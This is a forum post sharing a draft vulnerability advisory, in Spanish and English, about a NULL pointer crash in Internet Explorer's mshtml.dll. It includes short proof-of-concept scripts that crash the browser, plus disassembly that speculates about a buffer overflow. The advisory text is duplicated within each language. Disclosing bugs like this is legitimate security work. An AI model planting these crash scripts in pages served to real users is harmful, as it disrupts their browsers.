Autor
Pero alex me dijo que queria que el foro saliera en SecurityFocus, y Secunia y esos.. asi que voy a pblicar este.. y en INGLES! xD que me rechazaron uno de un bug en "OBJECT" porque estaba en español
Aqui esta el advisorie..
en ESPAÑOL:
Citar
== Software Afectado ==
Microsoft Windows Explorer (Win2000-XP)
Microsoft Internet Explorer 6.*
Microsoft Internet Explorer 7.0
== Introducción ==
Se ha encontrado un NULL Pointer Exception en Internet Explorer 5.0 y posteriores
que se podria tratar de un Buffer Overflow.
El error es causado en la libreria mshtml.dll version 5.0 en adelante, incluida la version 7.0 del navegador.
== Ejemplo ==
Este error se genera en la libreria mshtml.dll, de la siguente forma:
<script>
for(i in history.go);
</script>
entre otros códigos con el mismo principio, como:
<script>
for(i in document.location.reload);
</script>
o
<script>
for(i in document.appendChild);
</script>
etc..
== Explicación ==
El codigo genera que ESI tenga valor de NULL, por lo que al ser llamado:
636B1AE6 8942 14 MOV DWORD PTR DS:[EDX+14],EAX
aqui! >>> 636B1AE9 FF36 PUSH DWORD PTR DS:[ESI]
636B1AEB 8D4A 04 LEA ECX,DWORD PTR DS:[EDX+4]
Se genera un error.
es importante aclarar, que si se tuviera acceso al código fuente, o tras
un analisis mas extenso, se podria encontrar un BoF, ya que el valor de ESI
se convierte en una direccion de retorno tras ejecutar:
636B1B18 0FB741 10 MOVZX EAX,WORD PTR DS:[ECX+10]
636B1B1C 8B09 MOV ECX,DWORD PTR DS:[ECX]
636B1B1E 33D2 XOR EDX,EDX
636B1B20 391481 CMP DWORD PTR DS:[ECX+EAX*4],EDX
636B1B23 0F94C2 SETE DL
636B1B26 8BC2 MOV EAX,EDX
636B1B28 C3 RETN
que proviene de:
636B2055 56 PUSH ESI
636B2056 8BF1 MOV ESI,ECX
636B2058 E8 BBFAFFFF CALL mshtml.636B1B18
Como pueden ver si colocan un trace a ESI.
== Autor ==
SirDarckCat
elhacker.net
Microsoft Windows Explorer (Win2000-XP)
Microsoft Internet Explorer 6.*
Microsoft Internet Explorer 7.0
== Introducción ==
Se ha encontrado un NULL Pointer Exception en Internet Explorer 5.0 y posteriores
que se podria tratar de un Buffer Overflow.
El error es causado en la libreria mshtml.dll version 5.0 en adelante, incluida la version 7.0 del navegador.
== Ejemplo ==
Este error se genera en la libreria mshtml.dll, de la siguente forma:
<script>
for(i in history.go);
</script>
entre otros códigos con el mismo principio, como:
<script>
for(i in document.location.reload);
</script>
o
<script>
for(i in document.appendChild);
</script>
etc..
== Explicación ==
El codigo genera que ESI tenga valor de NULL, por lo que al ser llamado:
636B1AE6 8942 14 MOV DWORD PTR DS:[EDX+14],EAX
aqui! >>> 636B1AE9 FF36 PUSH DWORD PTR DS:[ESI]
636B1AEB 8D4A 04 LEA ECX,DWORD PTR DS:[EDX+4]
Se genera un error.
es importante aclarar, que si se tuviera acceso al código fuente, o tras
un analisis mas extenso, se podria encontrar un BoF, ya que el valor de ESI
se convierte en una direccion de retorno tras ejecutar:
636B1B18 0FB741 10 MOVZX EAX,WORD PTR DS:[ECX+10]
636B1B1C 8B09 MOV ECX,DWORD PTR DS:[ECX]
636B1B1E 33D2 XOR EDX,EDX
636B1B20 391481 CMP DWORD PTR DS:[ECX+EAX*4],EDX
636B1B23 0F94C2 SETE DL
636B1B26 8BC2 MOV EAX,EDX
636B1B28 C3 RETN
que proviene de:
636B2055 56 PUSH ESI
636B2056 8BF1 MOV ESI,ECX
636B2058 E8 BBFAFFFF CALL mshtml.636B1B18
Como pueden ver si colocan un trace a ESI.
== Autor ==
SirDarckCat
elhacker.net
Y en Ingles.
Citar
NULL Pointer Exception and Possible BoF in Microsoft Internet Explorer 6-7
== Affected Software ==
Microsoft Windows Explorer (Win2000-XP)
Microsoft Internet Explorer 6.*
Microsoft Internet Explorer 7.0
== Introduction ==
We have found a NULL Pointer Exception in Internet Explorer 5.0 and ahead
that could possibly lead into a Buffer Overflow.
The bug is in the library mshtml.dll 5.0 and ahead, included version 7.0 of the explorer, if there is no BoF its only a DoS bug.
== Example ==
This bug in mshtml.dll, is exploited in the following way:
<script>
for(i in history.go);
</script>
between other codes that have the same principle like:
<script>
for(i in document.location.reload);
</script>
or:
<script>
for(i in document.appendChild);
</script>
etc..
== Explication ==
The code, make ESI has a NULL value, so at here:
636B1AE6 8942 14 MOV DWORD PTR DS:[EDX+14],EAX
here! >>> 636B1AE9 FF36 PUSH DWORD PTR DS:[ESI]
636B1AEB 8D4A 04 LEA ECX,DWORD PTR DS:[EDX+4]
A NULL Pointer Exception is created.
Its important to say, that if the code of this library were public
or after an intense analisis, a BoF could be found because the value of ESI
becames a return value in the return of this function:
636B1B18 0FB741 10 MOVZX EAX,WORD PTR DS:[ECX+10]
636B1B1C 8B09 MOV ECX,DWORD PTR DS:[ECX]
636B1B1E 33D2 XOR EDX,EDX
636B1B20 391481 CMP DWORD PTR DS:[ECX+EAX*4],EDX
636B1B23 0F94C2 SETE DL
636B1B26 8BC2 MOV EAX,EDX
636B1B28 C3 RETN
And is called from:
636B2055 56 PUSH ESI
636B2056 8BF1 MOV ESI,ECX
636B2058 E8 BBFAFFFF CALL mshtml.636B1B18
As you can see if you depurate the program.
== Author ==
SirDarckCat
elhacker.net
== Affected Software ==
Microsoft Windows Explorer (Win2000-XP)
Microsoft Internet Explorer 6.*
Microsoft Internet Explorer 7.0
== Introduction ==
We have found a NULL Pointer Exception in Internet Explorer 5.0 and ahead
that could possibly lead into a Buffer Overflow.
The bug is in the library mshtml.dll 5.0 and ahead, included version 7.0 of the explorer, if there is no BoF its only a DoS bug.
== Example ==
This bug in mshtml.dll, is exploited in the following way:
<script>
for(i in history.go);
</script>
between other codes that have the same principle like:
<script>
for(i in document.location.reload);
</script>
or:
<script>
for(i in document.appendChild);
</script>
etc..
== Explication ==
The code, make ESI has a NULL value, so at here:
636B1AE6 8942 14 MOV DWORD PTR DS:[EDX+14],EAX
here! >>> 636B1AE9 FF36 PUSH DWORD PTR DS:[ESI]
636B1AEB 8D4A 04 LEA ECX,DWORD PTR DS:[EDX+4]
A NULL Pointer Exception is created.
Its important to say, that if the code of this library were public
or after an intense analisis, a BoF could be found because the value of ESI
becames a return value in the return of this function:
636B1B18 0FB741 10 MOVZX EAX,WORD PTR DS:[ECX+10]
636B1B1C 8B09 MOV ECX,DWORD PTR DS:[ECX]
636B1B1E 33D2 XOR EDX,EDX
636B1B20 391481 CMP DWORD PTR DS:[ECX+EAX*4],EDX
636B1B23 0F94C2 SETE DL
636B1B26 8BC2 MOV EAX,EDX
636B1B28 C3 RETN
And is called from:
636B2055 56 PUSH ESI
636B2056 8BF1 MOV ESI,ECX
636B2058 E8 BBFAFFFF CALL mshtml.636B1B18
As you can see if you depurate the program.
== Author ==
SirDarckCat
elhacker.net
por si tengo faltas de ortografia, sobre todo en el de español (y en el de Ingles) porfa diganme
Saludos!!
PD. Seria mandado el Lunes.
Por cierto.. lo publico el lunes
.
En línea
